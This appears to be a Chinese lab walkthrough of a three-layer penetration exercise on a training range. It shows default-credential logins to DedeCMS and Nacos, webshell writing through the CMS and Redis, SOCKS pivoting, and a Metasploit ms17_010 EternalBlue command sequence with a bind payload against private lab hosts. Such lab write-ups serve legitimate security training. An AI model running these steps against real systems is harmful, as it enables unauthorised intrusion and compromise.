无境靶场:州弟学安全:三层综合渗透

Web 192.168.111.20 / 192.168.52.2

入口 DEDECMS,地址:http://192.168.111.20:8080/dede/login.php

后台账户密码:admin/admin

d2b5ca33bd20251109152442

忽略官方 WP 那无意义的代码审计和扫描结果,直接找到网站下图的功能写 shell

d2b5ca33bd20251109152700

连接 shell

d2b5ca33bd20251109152749

内网 192.168.52.4 / 192.168.37.2

d2b5ca33bd20251109153029

不需要关心 nacos 的漏洞,老套路:要么 nacos/nacos 直接进去找密码,要么加个用户,拿到 P@ssw0rd_sec

d2b5ca33bd20251109153901

d2b5ca33bd20251109153954

同时还得到了绝对路径,其实猜测一下也八九不离十

d2b5ca33bd20251109153411

然后就是 redis 写 shell

d2b5ca33bd20251109152858

内网 192.168.37.6

官方 WP 直接挂 frp 的代理只有两层,MSF 理所当然不能触达路由

但是还是可以使用 MSF,先看代理 Topo

d2b5ca33bd20251109154200

在 节点 Node 1 开启 socks 服务器

使用 MSF 挂上全局代理,这里的 payload 直接使用搜索使用数字应用了

MSF 版本是 metasploit v6.4.84-dev,重要的点:选个正向连接的 payload 就行

# 设置 MSF 的全局代理
setg Proxies socks5:127.0.0.1:1000

# 永恒之蓝利用
search ms17_010
use 0
show payloads
set payload 26
set lhosts 0.0.0.0
set rhost 192.168.37.6
# Payload代理:如果想让payload回连也走代理,需要设置
set ReverseAllowProxy true
# 但这里使用了 bind_tcp 正向连接才能成功,反向连接无路由

d2b5ca33bd20251109154726

别忘记查看 flag

d2b5ca33bd20251109154943

总结

太麻烦了

© 版权声明
THE END
喜欢就支持一下吧
点赞35 分享
评论 共1条

请登录后发表评论

    请登录后查看评论内容